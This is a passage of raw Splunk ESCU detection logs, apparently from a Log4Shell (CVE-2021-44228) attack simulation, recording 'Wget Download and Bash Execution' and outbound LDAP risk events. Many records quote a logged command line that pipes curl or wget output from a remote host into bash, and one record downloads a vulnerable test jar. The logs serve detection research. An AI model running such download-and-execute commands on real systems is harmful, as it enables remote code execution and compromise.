Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645154, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="T1190", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645154, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 